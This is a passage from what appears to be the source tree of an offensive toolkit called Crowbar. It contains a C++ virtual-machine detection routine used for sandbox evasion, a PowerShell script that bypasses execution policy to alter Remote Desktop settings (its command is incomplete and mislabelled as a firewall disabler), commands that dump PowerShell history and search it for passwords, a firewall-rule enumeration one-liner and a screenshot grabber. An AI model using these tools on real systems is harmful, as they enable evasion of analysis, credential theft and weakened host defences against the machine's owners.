| DWORD sz = 1000; 19 | int ret; 20 | 21 | ret = RegGetValueA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\SystemInformation", "SystemManufacturer", RRF_RT_ANY, NULL, &buf[0], &sz); 22 | toLowerCase(buf, strlen(buf)); 23 | sysManufacturer = buf; 24 | 25 | if (ret == ERROR_SUCCESS && (sysManufacturer.find("vmware") != std::string::npos || sysManufacturer.find("innotek gmbh") != std::string::npos)) { 26 | return 1; 27 | } 28 | 29 | ret = RegGetValueA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\SystemInformation", "SystemProductName", RRF_RT_ANY, NULL, &buf[0], &sz); 30 | 31 | toLowerCase(buf, strlen(buf)); 32 | sysName = buf; 33 | //add more strings to make it better :) 34 | if 
(ret == ERROR_SUCCESS && (sysName.find("vmware") != std::string::npos || sysName.find("virtualbox") != std::string::npos)) { 35 | return 1; 36 | } 37 | return 0; 38 | } 39 | -------------------------------------------------------------------------------- /util/disable_firewall.ps1: -------------------------------------------------------------------------------- 1 | -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value' -------------------------------------------------------------------------------- /util/get_powershell_history.ps1: -------------------------------------------------------------------------------- 1 | type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 2 | type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 3 | type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 4 | cat (Get-PSReadlineOption).HistorySavePath 5 | cat (Get-PSReadlineOption).HistorySavePath | sls passw -------------------------------------------------------------------------------- /util/list_firewall_blocked_ports.ps1: -------------------------------------------------------------------------------- 1 | $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports -------------------------------------------------------------------------------- /util/screencapture.py: -------------------------------------------------------------------------------- 1 | import os 2 | import pyautogui 3 | 4 | def functionclear(): 5 | if os.name == "nt": 6 | os.system("cls") 7 | else: 8 | os.system("clear") 9 | functionclear() 10 | 11 | screenshot = pyautogui.screenshot() 12 | screenshot.save("image.jpg") 13 | 14 | print(''' 15 | +——— Message 
————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 16 | | Screenshot captured! | 17 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 18 | 19 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 20 | | crowbar - Goes back to the Crowbar main menu. | 21 | | clear - Clears the screen. | 22 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 23 | ''') 24 | 25 | def main(): 26 | while True: 27 | userinput = input(f"\n({os.getcwd()})\n |==> ") 28 | if userinput == "crowbar": 29 | os.system("py main.py") 30 | elif userinput == "clear": 31 | os.system("cls") 32 | else: 33 | print("Wrong Command!") 34 | main() --------------------------------------------------------------------------------